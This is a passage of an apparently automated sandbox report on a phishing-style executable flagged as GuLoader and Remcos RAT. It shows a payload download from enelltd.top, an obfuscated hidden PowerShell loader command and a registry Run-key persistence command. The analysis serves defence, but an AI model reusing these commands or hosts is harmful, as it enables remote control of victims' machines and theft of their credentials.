                                                      Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 32 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                      Data Ascii: { "geoplugin_request":"191.96.150.225", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449739104.21.45.1394437188C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-05-02 17:01:51 UTC177OUTGET /XpMumnKrmZynRk242.bin HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: enelltd.top
                                                      Cache-Control: no-cache
                                                      2024-05-02 17:01:51 UTC839INHTTP/1.1 200 OK
                                                      Date: Thu, 02 May 2024 17:01:51 GMT
                                                      Content-Type: application/octet-stream
                                                      Content-Length: 494656
                                                      Connection: close
                                                      Last-Modified: Thu, 02 May 2024 12:12:55 GMT
                                                      ETag: "66338347-78c40"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      CF-Cache-Status: HIT
                                                      Age: 13087
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ipxCdDXaUj%2FLYHTkG4c5d9Je3CjYMEeR6L6M0ezKhORpitzNe1bBbuPGC%2F9SxZY0QVeAgfEUCAbOiVbH182XLtJSsd9qXtoxvi0A1rpYSx0FICisKNwZyVEt68sWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                      X-Content-Type-Options: nosniff
                                                      Server: cloudflare
                                                      CF-RAY: 87d9935bdedb438d-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-05-02 17:01:51 UTC530INData Raw: 44 db e4 aa d7 31 2e 25 b7 8e e2 cf e4 69 3e 7b 32 bc f4 12 1a 10 fb b6 7d 1b 73 4d fe dd 77 6d de 33 36 65 38 20 22 10 3e 54 c2 0f 1d 5b 58 47 9e 8b cf c9 15 2b 7d 19 20 6e eb 99 6f 71 5a ce 89 33 9f 63 b4 2b 0b c5 a5 40 dd c0 22 8f ba d4 27 84 bd 52 3d 21 d8 7a 28 5a 52 6b 56 e0 d5 4c f6 47 77 78 e4 50 f3 cc 22 72 26 fd 59 f2 45 2b 9b dd f2 83 87 33 c1 17 f4 ba 11 a3 d0 2e a2 ae f3 1e 69 ff ad a1 61 88 5d 96 63 89 80 2a 1f 77 31 3f 73 12 c3 10 0e d8 ef 99 96 df f8 b8 cb 47 52 0c 7d 54 3e 1b 29 7e 1b 2d 53 09 ed c1 5f d7 02 67 11 3e 2e 7a 30 04 4e f2 fc dd 74 fb e1 a1 7a 0e a1 77 93 54 08 c7 91 bf 3e fe 81 7b 80 fd 8f 6a d0 8e be 0f 58 41 ba 1b be c8 43 a8 84 38 1c e4 37 38 5d fd ae f8 c4 8f 5e a6 b7 b5 1c 67 85 6f a9 8b d7 b8 aa 36 76 6a 2a 58 55 7f 95
                                                      Data Ascii: D1.%i>{2}sMwm36e8 ">T[XG+} noqZ3c+@"'R=!z(ZRkVLGwxP"r&YE+3.ia]c*w1?sGR}T>)~-S_g>.z0NtzwT>{jXAC878]^go6vj*XU
                                                      2024-05-02 17:01:51 UTC1369INData Raw: 48 bf c0 b7 14 16 32 d0 f0 bb f2 73 4d 85 13 44 d7 f9 b7 b7 3d 91 42 07 e9 95 fb 2b 45 eb d5 e7 e5 b1 3f 2d 5e 96 97 6b bf 84 90 78 d3 09 42 03 4a 18 84 c6 e8 06 81 39 e6 f7 9f dd cf 55 5a 16 54 eb 02 a3 f8 b0 bf 5e 23 ee 6c 5c e8 54 38 f9 74 51 da cf 30 30 c7 98 e8 d5 4a 9c 91 56 2f 76 64 e8 8e 49 10 e4 0c b3 ef 2e b5 1f de 42 dc 48 df ac 7c 0a ec ad 76 1c 00 22 62 0a ad ad 96 6f 01 3b 9d da 18 8e 25 c2 21 1f 71 6e 52 54 c8 0b dc 09 33 ab cc 82 38 43 50 79 e8 bd 6d 19 ec 16 6d f6 74 2e fd 85 61 03 e9 00 28 6e c5 50 65 5b f0 9d 5e 23 56 b0 61 84 da ab 1b cc e8 37 9e f2 99 f2 48 03 04 69 70 05 57 88 38 e6 14 c9 62 77 1c cc 74 80 c8 d1 99 b0 91 93 f6 b2 40 8a cb 48 ef 59 aa be 9b b1 da 94 10 74 ab 80 73 d9 64 2c 6c 06 b7 17 bc 3c 47 74 e7 f1 34 01 17 67 ce
                                                      Data Ascii: H2sMD=B+E?-^kxBJ9UZT^#l\T8tQ00JV/vdI.BH|v"bo;%!qnRT38CPymmt.a(nPe[^#Va7HipW8bwt@HYtsd,l<Gt4g
                                                      2024-05-02 17:01:51 UTC1369INData Raw: 35 2e ca b8 7f 4e 2a 54 19 02 60 93 4d 49 de 85 3f 16 d2 71 2b 64 9e 48 8b 22 50 13 47 a4 6b f9 9a 7f 3c 94 5a dc 55 5f d6 f7 a2 06 ce 7b e0 1c 05 b8 dd 6d 0d 03 0e 96 80 1b 67 59 57 eb ff f3 02 e5 21 47 e2 28 a5 1b 6d 46 e8 4e f0 be 50 0d 3b f2 99 c6 e3 99 bc 6b dc f9 05 35 c5 76 bc 66 4e 57 07 84 17 16 13 c0 4f a3 e4 34 4d 6d 51 49 d7 f9 df 7c bd d4 42 7f 25 a6 04 2f 1c 28 3c 88 de b0 3f 47 5e 2f a7 3d f8 84 78 45 e0 09 42 6b 9f 98 c1 c6 00 aa 9c 4e 83 d6 28 b7 cf ec 7f 3f 16 eb ea 96 cb b0 bf 44 f9 6e 29 58 00 c0 0b fa 74 08 19 76 d0 66 80 98 00 97 19 9d 91 5e e8 84 45 89 12 56 23 e7 ba 93 2d 97 2d d8 9c 42 34 1e ad ad 7c 14 1a 2d 33 1c e8 4a 51 09 ad f4 55 07 31 f3 9b da 70 8e c3 e0 40 94 05 1e c0 11 8c 06 23 1c 8f 29 8e 82 9b d9 07 3e e8 8e d2 d1 ba
                                                      Data Ascii: 5.N*T`MI?q+dH"PGk<ZU_{mgYW!G(mFNP;k5vfNWO4MmQI|B%/(<?G^/=xEBkN(?Dn)Xtvf^EV#--B4|-3JQU1p@#)>
                                                      2024-05-02 17:01:51 UTC1369INData Raw: 17 6c 35 1f f4 6d 37 cd 8f 84 a2 b0 5d 04 65 e2 53 ca 26 3e 1e ee 0e 5c 42 bd 81 f3 b6 9d 78 c2 de 33 c9 45 fd f9 0d 1c 1f 74 60 5f 9f f0 02 3d ba ee c9 be f2 e7 5e aa 3f 5b e4 a7 5e 9f da 64 46 2c 9b d6 f8 64 71 36 9e f5 4e d7 8b 1c bf 62 32 92 ef d9 20 ff 95 69 aa e9 24 58 4c 09 5d c5 5d 37 77 79 55 e1 11 61 6f 0c b2 9f 1c 98 bf c2 3f ad b3 69 2f f7 b3 eb f4 52 84 90 25 90 d1 a1 8e fb 85 04 56 9e 55 b7 0e 44 42 48 e1 d6 ed d5 21 84 d2 59 0e 55 3d 75 15 6e ca 49 90 ab ff 1b da 80 4b 55 e2 37 0f 19 6d 23 93 59 23 be 09 ce b9 8c 27 5e b6 8e ea 39 34 87 42 35 20 3b 18 9b 4e bf d8 5f f1 03 4a 03 af 30 62 fe c1 a1 8f 44 d7 f9 5f f1 28 91 42 ce 67 45 8a a3 61 6b d5 e7 e5 59 99 38 5e 96 ce e0 6f 09 dc 5c b7 e1 69 16 4a 18 dd 4d 38 8b e3 69 cb 67 65 c8 cf 55 76
                                                      Data Ascii: l5m7]eS&>\Bx3Et`_=^?[^dF,dq6Nb2 i$XL]]7wyUao?i/R%VUDBH!YU=unIKU7m#Y#'^94B5 ;N_J0bD_(BgEakY8^o\iJM8igeUv
                                                      2024-05-02 17:01:51 UTC1369INData Raw: 53 03 9c 42 7f c5 df ea ec cf 1e 84 40 a6 da ed 68 9b 89 0c 1a c5 f7 a0 45 2b 00 14 1c 1e 50 7c a4 f2 95 09 0f e7 13 c3 48 7d 71 77 b7 42 f2 e4 7a a5 e3 94 b0 99 f4 2a 23 3a 63 fe 52 ab 5f 48 1b 98 94 a8 4c 7a 1a 06 33 29 2d b5 4a 52 89 6e 78 42 24 98 d3 c2 8e 7a 7a 0e 94 8a d0 9d 4e 43 6b 18 ee b7 5e 55 c8 cf 8f d5 03 e2 a2 31 a5 b6 3b 74 09 40 09 7a 1d b4 89 da a6 e3 dd 0b a8 a9 99 6d bd f9 d5 21 4a 97 86 17 d4 99 12 f3 6a 0d 4e ff ed 5e 7d 0b 2b b8 ed c3 e4 89 76 9c da 56 01 78 e1 c5 18 fd b8 f4 9a 7e e3 17 a4 a2 bc ae db 4c 69 a3 21 47 52 5c 6c 01 cd db 92 7a 5c 94 0e e1 1d 74 1a 56 af 38 57 45 39 db 3a 41 16 c0 3f fe 1d 94 dd 66 f6 eb 8f a7 24 d9 e1 f5 94 f9 92 37 4b 04 8e 99 55 b7 d5 f2 4a 6f b7 d6 60 00 8e 9e 3a 30 0c 03 57 d6 ea 2b 5d ec ff 53 74
                                                      Data Ascii: SB@hE+P|H}qwBz*#:cR_HLz3)-JRnxB$zzNCk^U1;t@zm!JjN^}+vVx~Li!GR\lz\tV8WE9:A?f$7KUJo`:0W+]St
                                                      2024-05-02 17:01:51 UTC1369INData Raw: 00 37 e7 28 e2 d6 aa e0 3d 65 12 19 4d 6c 22 2c 1f ba f6 e2 93 93 46 44 35 5a 8a 66 eb 09 90 f7 fe 53 41 26 b6 c1 82 17 01 22 8b ab 6a 6a 9e 48 e7 a5 24 fe 35 ee 2b ba 14 03 0d 8d be ab 9b c1 09 0f 1a 7e 7d b4 8d 2b 70 75 51 ad ae 16 08 88 1d 46 0b 5e 2b 0d 4e e5 8e 26 01 b0 42 d1 bb 5a b6 f5 9d c1 59 48 18 01 14 bd f9 7a bf 2d af ee b2 34 18 79 2d b1 aa 5e ba 1c 76 fb 9e ea 05 83 91 b9 ea 4e 84 d7 6c 87 b6 38 f8 de 23 84 4b 1b 6d 63 bc c9 eb 31 d0 89 2b 6c 00 fa f3 39 fe fe 6f 9c 38 75 21 53 5d 06 1b 7d 84 c9 5a 13 0d 98 63 a6 8b c1 8d a9 5b be 06 89 18 a0 1c 75 66 9a 41 d6 aa 6c 5b 4b 49 75 fb 9b 37 e4 b5 88 69 9c 7c 2d a6 00 b1 ed aa 4b fb 15 46 ff be a3 23 67 d9 63 c9 68 ac f7 b6 65 2d 63 da fa 57 18 15 0e c5 ab 94 0d cd 07 b5 f0 65 0d 0c bc 00 b8 d6
                                                      Data Ascii: 7(=eMl",FD5ZfSA&"jjH$5+~}+puQF^+N&BZYHz-4y-^vNl8#Kmc1+l9o8u!S]}Zc[ufAl[KIu7i|-KF#gche-cWe
                                                      2024-05-02 17:01:51 UTC1369INData Raw: 2b a0 4f 2d 09 c4 28 b7 e6 cc 9f e7 a6 4c 0a 81 0f 67 b7 2b c7 ad ed 1e 9b c0 35 ad 93 d7 9f 48 3e 2e 19 25 d8 29 e3 83 26 42 be 68 2c b3 09 7e 33 5c ec 22 ed 9a a9 b9 ce 87 a0 0d ba a0 50 56 02 6b ef ca 3e e8 f7 8a 2a d7 e4 23 fc d8 f9 b1 d2 1a af 27 a8 1e be 2a 62 93 1a 80 b2 f7 a4 48 53 62 3a 0b 4d a6 05 3b 8d 7a eb 8e 4d a3 d8 d3 e0 08 2e 1a 4f 9b f4 ac 0f d0 56 71 87 38 90 38 23 b3 99 74 3d 0e 81 c0 7c a1 50 eb e1 d5 69 16 e4 4a a8 b4 56 76 31 56 12 7f 36 0a 9a 08 73 37 04 ff a7 33 dd 55 47 95 0b 4c 53 ad ba 4a 65 74 65 4c 5d 8c b4 6e 95 0d 0f d8 7b b9 96 16 c6 f5 e5 37 95 42 97 04 6c 31 03 eb 52 0e ac f7 32 8d f2 24 76 78 59 3b 29 c5 7c 28 ae 60 be f8 43 7c 91 bb cf 5e e7 04 f8 78 23 3b b7 9e 23 de 59 1b 6d 65 bb ca 3b 16 89 4b af 10 71 75 1f ec 08
                                                      Data Ascii: +O-(Lg+5H>.%)&Bh,~3\"PVk>*#'*bHSb:M;zM.OVq88#t=|PiJVv1V6s73UGLSJeteL]n{7Bl1R2$vxY;)|(`C|^x#;#Yme;Kqu
                                                      2024-05-02 17:01:51 UTC1369INData Raw: f0 f9 4a 79 be 57 d2 4a b3 ee 65 3b 48 a6 ef f7 61 0c 6c 61 5f 3f 92 b7 31 b8 19 9d 5a b1 6c 45 81 7f c8 23 e4 f2 1a 74 bf 8c 8e 61 85 dc 3c ca 69 ae 8a 8b 78 0b 29 74 24 a3 99 cf b4 4e 7b ce f6 86 49 e3 cc aa 57 53 01 86 2d b0 08 dc 85 31 c1 2b 05 e1 d3 3e 14 df 77 0c 7e 5b 8b 8e 47 25 d4 2b 1e fe 55 e0 20 c5 bb 50 59 e3 4f ec c4 69 0f db 1d 81 a1 cf 62 cb 91 e4 d9 99 95 d4 9f 84 36 1e 19 25 31 56 68 5a 52 01 57 8a d7 b3 82 63 7b 90 04 b7 0c 33 a1 b6 2a 3f 5d f2 2f 2a f1 dc 0d f7 a3 3f 29 da 13 45 ee 20 04 23 60 aa fd b9 2c 0e 52 6a ab c6 b4 d1 a1 96 18 5d c0 c5 d3 a5 04 e9 7a 97 ff 5f 71 0b 3d 77 12 26 4d eb d3 d3 e0 ba 62 4d 48 3b cb cf f2 c1 1f 7b f3 08 54 ce 03 73 8b b8 d5 7b 9f 0d 03 56 bb 70 11 49 d4 60 e5 a5 50 65 f6 49 31 dc 1e 7f 36 ba a5 f1 78
                                                      Data Ascii: JyWJe;Hala_?1ZlE#ta<ix)t$N{IWS-1+>w~[G%+U PYOib6%1VhZRWc{3*?]/*?)E #`,Rj]z_q=w&MbMH;{Ts{VpI`PeI16x
                                                      2024-05-02 17:01:51 UTC1369INData Raw: c8 01 6e d1 af 35 4a 95 27 25 b9 73 4d be 8d 4b c5 7d 2b 28 9f 97 31 fe c5 ea 84 7b 31 72 45 1f 8c cf cf 3f f8 9e c4 fe d1 13 9c 18 b7 64 15 7c 4d 31 20 22 72 05 09 4f 0c b3 a7 8a cd 67 2e 71 84 6c d2 32 2b be 98 77 6a bf 0d 19 45 42 b6 9a 37 6b 22 34 ec 0d 2c c8 2e 37 10 ee 8e c6 5b 7c cb 11 05 5d 76 2d 2c bc 93 06 91 3f 48 a6 9b 69 de ca 10 45 4b 87 b1 a2 e2 94 67 2a 5a 35 e4 0b ca ca b2 1f fa d4 fd e8 c6 6e 8e ea 8a 28 5f 9d 50 ae 22 5e 43 73 cf 60 db bd bc 2c 28 ed 72 31 82 4b b7 0b 48 42 fb 27 de 66 31 27 53 34 f9 db 3e d4 fa c4 1f 38 9f 11 24 bd 78 aa 74 98 eb eb 5f f3 a7 23 a3 1f df 4e 8e b6 7d 68 6b 4e 80 4d 17 94 66 a0 0b 4e 71 6b 0e fb 17 7f 3c 68 9f 84 bd 79 79 05 cc 51 ab d3 16 4f 76 db 3e 3f dd 17 fc b6 0c a2 1e 33 dd f9 6a d9 41 f1 8e a6 9f
                                                      Data Ascii: n5J'%sMK}+(1{1rE?d|M1 "rOg.ql2+wjEB7k"4,.7[|]v-,?HiEKg*Z5n(_P"^Cs`,(r1KHB'f1'S4>8$xt_#N}hkNMfNqk<hyyQOv>?3jA
                                                      2024-05-02 17:01:51 UTC1369INData Raw: 8d dd be ee 7d 62 ca e4 96 f4 ea 44 90 13 68 74 0a 05 0b 65 d2 58 62 09 64 3d e3 f4 17 0b fc 25 44 4e 99 a1 6d ce 0b 51 f3 ed a4 d5 0b 10 5e 45 15 67 56 a2 f4 7a 57 ef c6 5e de c3 7d 05 fd b9 e0 3c d2 08 7a 59 27 99 dd 6a fe f4 2d 88 b2 45 a8 41 b1 05 cb 9f fd 90 d5 15 cb 08 41 aa 5d bb 8e 3e 6e d1 af 35 79 8d 27 25 b9 16 08 6b 9a f8 46 b9 27 f3 da 0c 31 62 36 15 7b ad a8 a7 08 a4 8a cf cf 3f 19 af 46 81 c1 98 47 c4 6d 8d 0b 2d c6 dd 61 57 7e ed 49 ba 7e 09 3c 9e 01 8c 4d 87 40 ef 90 ae 66 78 d4 27 09 16 5a aa 9e 1f c4 70 fc 6c 95 20 13 91 ce df 05 20 06 97 00 8b 53 7a ce d2 19 91 0a da d2 81 14 c2 74 92 75 55 64 6e d8 12 e7 3d 7b 1c 15 a3 5d 29 1f 2c 4d b3 c5 70 f5 35 e5 c4 a6 7b a9 24 bf d6 99 ea 4f 2f 2b ac f5 75 55 83 73 54 03 52 d4 36 67 cf b4 4e 5b
                                                      Data Ascii: }bDhteXbd=%DNmQ^EgVzW^}<zY'j-EAA]>n5y'%kF'1b6{?FGm-aW~I~<M@fx'Zpl SztuUdn={]),Mp5{$O/+uUsTR6gN[


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:18:58:48
                                                      Start date:02/05/2024
                                                      Path:C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe"
                                                      Imagebase:0x400000
                                                      File size:501'264 bytes
                                                      MD5 hash:CBFE477536E5434005EC40A22C8B79EE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:18:58:54
                                                      Start date:02/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Amphioxidae.Zin';$Relaying=$Moralioralist.SubString(7931,3);.$Relaying($Moralioralist)"
                                                      Imagebase:0xdc0000
                                                      File size:433'152 bytes
                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.3490629462.000000000C710000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:18:58:54
                                                      Start date:02/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:18:58:55
                                                      Start date:02/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
                                                      Imagebase:0x240000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:9
                                                      Start time:19:01:26
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.3951905036.0000000009B5D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.4113065678.0000000009B48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.3888277399.0000000009B5E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:10
                                                      Start time:19:01:48
                                                      Start date:02/05/2024
                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"
                                                      Imagebase:0x240000
                                                      File size:236'544 bytes
                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:19:01:48
                                                      Start date:02/05/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff7699e0000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:12
                                                      Start time:19:01:48
                                                      Start date:02/05/2024
                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Insecta" /t REG_EXPAND_SZ /d "%Fumigatorium% -windowstyle minimized $Hysterogenic=(Get-ItemProperty -Path 'HKCU:\Stafetlbenes\').Indsbedes;%Fumigatorium% ($Hysterogenic)"
                                                      Imagebase:0xbc0000
                                                      File size:59'392 bytes
                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:16
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:17
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:18
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Has exited:true

                                                      Target ID:20
                                                      Start time:19:02:42
                                                      Start date:02/05/2024
                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wyqilubvhsthredobavonduvmyumohspi"
                                                      Imagebase:0x430000
                                                      File size:516'608 bytes
                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                      Has elevated privileges:true
